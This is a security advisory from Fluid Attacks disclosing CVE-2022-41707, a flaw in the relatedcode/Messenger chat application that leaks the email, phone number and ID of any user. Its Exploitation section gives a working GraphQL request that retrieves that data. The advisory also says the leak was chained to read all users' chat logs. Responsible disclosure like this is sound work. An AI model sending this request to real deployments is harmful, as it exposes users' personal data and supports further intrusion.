relatedcode/Messenger 7bcd20b - Information Disclosure

Summary

Namerelatedcode/Messenger 7bcd20b - Sensitive Information Disclosure
Code name
Productrelatedcode/Messenger
Affected versionsVersion 7bcd20b
StatePublic
Release date2022-10-14

Vulnerability

KindBusiness information leak - Personal Information
Rule
RemoteYes
CVSSv3.1 VectorCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
CVSSv3.1 Base Score6.5
Exploit availableYes
CVE ID(s)

Description

Relatedcode/Messenger version 7bcd20b allows an authenticated external attacker to access sensitive data of any user of the application. This is possible because the application exposes user data to the public.

Vulnerability

The application exposes the session data of the users of the application to the public. Among the exposed data are:

  • ID
  • Email
  • PhoneNumber
  • Etc

image.png

The ID exposed in this vulnerability will help us to exploit even a broken access control present in this application.

Exploitation

To exploit this vulnerability, simply create an account on the server and then send the following request:

POST /graphql HTTP/2
Host: relatedchat.io:4000
User-Agent: Something
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://relatedchat.io/
Content-Type: application/json
Authorization: Bearer [YOUR TOKEN]
Origin: https://relatedchat.io
Content-Length: 356

{"operationName":"ListUsers","variables":{},"query":"query ListUsers($updatedAt: Date, $workspaceId: String) {\n  listUsers(updatedAt: $updatedAt, workspaceId: $workspaceId) {\n    objectId\n    displayName\n    email\n  fullName\n    phoneNumber\n    photoURL\n    theme\n    thumbnailURL\n    title\n    workspaces\n    createdAt\n    updatedAt\n  }\n}"}

Impact

An authenticated remote attacker can access sensitive user data. This allows an attacker to obtain enough information to escalate to more serious attacks. In our case, we managed to exploit a broken access control thanks to the data leaked in this vulnerability. Thanks to this I was able to access all the internal chat logs of all registered users.

Our security policy

We have reserved the CVE-2022-41707 to refer to this issue from now on.

System Information

  • Version: relatedcode/Messenger 7bcd20b

  • Operating System: GNU/Linux

Mitigation

There is currently no patch available for this vulnerability.

Credits

The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.

References

Vendor page https://github.com/relatedcode/Messenger

Timeline

Time-lapse-logo

2022-09-23

Vulnerability discovered.

Time-lapse-logo

2022-09-23

Vendor contacted.

Time-lapse-logo

2022-09-23

Vendor replied acknowledging the report.

Time-lapse-logo

2022-09-23

Vendor Confirmed the vulnerability.

Time-lapse-logo

2022-10-14

Public Disclosure.

Fluid Logo Footer

Hacking software for over 20 years

Fluid Attacks tests applications and other systems, covering all software development stages. Our team assists clients in quickly identifying and managing vulnerabilities to reduce the risk of incidents and deploy secure technology.

Copyright © 0 Fluid Attacks. We hack your software. All rights reserved.